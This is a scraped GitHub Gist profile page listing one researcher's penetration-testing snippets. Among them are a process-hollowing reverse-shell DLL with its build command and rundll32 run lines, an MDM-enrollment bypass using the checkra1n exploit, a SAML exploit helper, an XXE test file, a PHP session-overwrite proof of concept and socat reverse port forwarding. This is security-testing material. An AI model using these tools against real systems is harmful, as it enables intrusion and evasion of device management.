Skip to content

Instantly share code, notes, and snippets.

View FrankSpierings's full-sized avatar

Frank Spierings FrankSpierings

47 followers · 1 following
View GitHub Profile
@FrankSpierings
FrankSpierings / samlraider.py
Created February 25, 2021 12:57
SAMLRaider in Python, useful to automate (new) logins and the automatic exploit checks.
import xml.dom.minidom as minidom
# Constants
COLLABORATOR = 'example.burpcollaborator.net'
class SAMLRaider():
def __init__(self, match_replace_map: dict = None):
"""SAMLRainder object
@FrankSpierings
FrankSpierings / README.MD
Last active February 5, 2024 15:25
Apple Device Enrollment Program (DEP) - ByPass MDM Policy using Checkra1n exploit

Pre-requirements

  • Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
  • Start the socket daemon iproxy 2222 44
  • Install checkra1n exploit locally, run: brew install checkra1n
  • When SSH password authentication is requested, use: alpline.

Wipe iPad and restore Firmware

@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active August 30, 2022 20:46
Reverse shell which uses process hollowing technique
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@FrankSpierings
FrankSpierings / request-minify.py
Last active February 9, 2021 13:17
Burp extension to minify a requests headers and parameters to another repeater tab.
from burp import IParameter
from burp import IBurpExtender
from burp import IContextMenuFactory
from burp import IContextMenuInvocation
from javax.swing import JMenuItem
import java.util.ArrayList as ArrayList
from threading import Thread
from Queue import Queue
from traceback import format_exc
import time
@FrankSpierings
FrankSpierings / burp-ntfs-ads-scan.py
Last active November 10, 2020 08:15
Burp NTFS Alternative Data Stream Scanner
# coding=utf-8
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IScannerInsertionPoint
from array import array
class BurpExtender(IBurpExtender, IScannerCheck):
@FrankSpierings
FrankSpierings / cookie-authenticated-onedrive-enum.py
Created October 6, 2020 16:02
Checks OneDrive access based on someone's UPN.
@FrankSpierings
FrankSpierings / README.MD
Last active June 5, 2021 08:11
Windows Reverse Port Forwarding using C# / Powershell

Socat

  • On the lhost listening side you can use socat to create two server sockets.
socat -dd TCP-LISTEN:4444,reuseaddr,fork TCP-LISTEN:1234,reuseaddr
  • Once WPF connected to port 4444, you can talk to 127.0.0.1:1234 as if it where the remote host.
@FrankSpierings
FrankSpierings / sample-php-socket-connect.php
Created August 11, 2020 09:47
PHP Socket Connect Example Reference
<?php
$host = "ifconfig.co";
$port = 80;
$msg = "GET / HTTP/1.1\r\nHost: $host\r\n\r\n";
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, $host, $port);
socket_send($sock, $msg, strlen($msg), 0);
$result = socket_read($sock, 4096);
echo $result;
@FrankSpierings
FrankSpierings / README.MD
Created August 6, 2020 13:19
Session overwrite in PHP through extract - PoC

Exploit

  • POST-ing a body containing _SESSION[secret]=1 will log you in, but only through the second extract.
@FrankSpierings
FrankSpierings / xxe-test.xml
Created June 29, 2020 14:17
<?xml version="1.0"?>
<!DOCTYPE dt [
<!ENTITY sample "KqsdwTrqAisGYNNu5XMhkUV4gTxm8ed8">
]>
<root>&sample;</root>